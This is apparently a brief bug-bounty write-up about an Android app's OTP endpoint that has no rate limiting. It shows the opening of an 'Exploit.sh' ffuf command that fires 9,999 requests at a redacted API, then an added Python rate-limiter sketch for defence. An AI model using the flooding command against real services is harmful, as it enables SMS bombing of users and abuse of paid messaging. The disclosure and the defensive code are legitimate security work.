Android No Rate Limiting Leads to Mass SMS Brute-Force
The endpoint requests an OTP, but the problem is that there is no rate limiting. We can request unlimited OTPs.
I crafted an ffuf request to make it faster and easier.
Exploit.sh
#! /bin/bash
seq 1 9999 | ffuf -u https://sub.redacted.com/api/v2/otp \
-H 'accessTo...
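On the defensive side, the missing control is a throttle on OTP sends keyed on both the destination number and the client. The sketch below is an added example, not code from the original post or the affected application; the class name, limits, phone numbers and IP address are all assumed or constructed values.

```python
import time
from collections import defaultdict, deque

class OtpSendLimiter:
    """Sliding-window throttle for an OTP-send endpoint. Limits are assumed values."""

    def __init__(self, per_phone=3, per_ip=10, window=600, cooldown=30,
                 clock=time.monotonic):
        self.limits = {"phone": per_phone, "ip": per_ip}
        self.window = window      # seconds over which sends are counted
        self.cooldown = cooldown  # minimum gap between sends to one number
        self.clock = clock
        # In-memory store for the demo; a shared store with expiry is needed
        # when several API instances serve the endpoint.
        self.sent = defaultdict(deque)

    def _recent(self, key, now):
        q = self.sent[key]
        while q and now - q[0] >= self.window:
            q.popleft()
        return q

    def allow(self, phone, ip):
        """Return (allowed, retry_after_seconds); record the send only if allowed."""
        now = self.clock()
        phone_q = self._recent(("phone", phone), now)
        ip_q = self._recent(("ip", ip), now)
        if phone_q and now - phone_q[-1] < self.cooldown:
            return False, self.cooldown - (now - phone_q[-1])
        for kind, q in (("phone", phone_q), ("ip", ip_q)):
            if len(q) >= self.limits[kind]:
                return False, self.window - (now - q[0])
        phone_q.append(now)
        ip_q.append(now)
        return True, 0

def simulate_burst(requests=9999, rate=100, rotate_phones=False):
    """Constructed traffic: `requests` calls at `rate`/s from one client IP."""
    tick = [0]
    limiter = OtpSendLimiter(clock=lambda: tick[0] / rate)
    sms_sent = 0
    for i in range(requests):
        tick[0] = i
        phone = f"+1555{i:07d}" if rotate_phones else "+15550000001"
        allowed, _ = limiter.allow(phone, "203.0.113.7")
        sms_sent += allowed
    return sms_sent

if __name__ == "__main__":
    print("one number:", simulate_burst())
    print("rotating numbers:", simulate_burst(rotate_phones=True))
```

The per-IP counter is what holds when the destination number changes on every request; a per-number limit alone would let that pattern through.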
thesecurityguy.hashnode.dev | 1 min read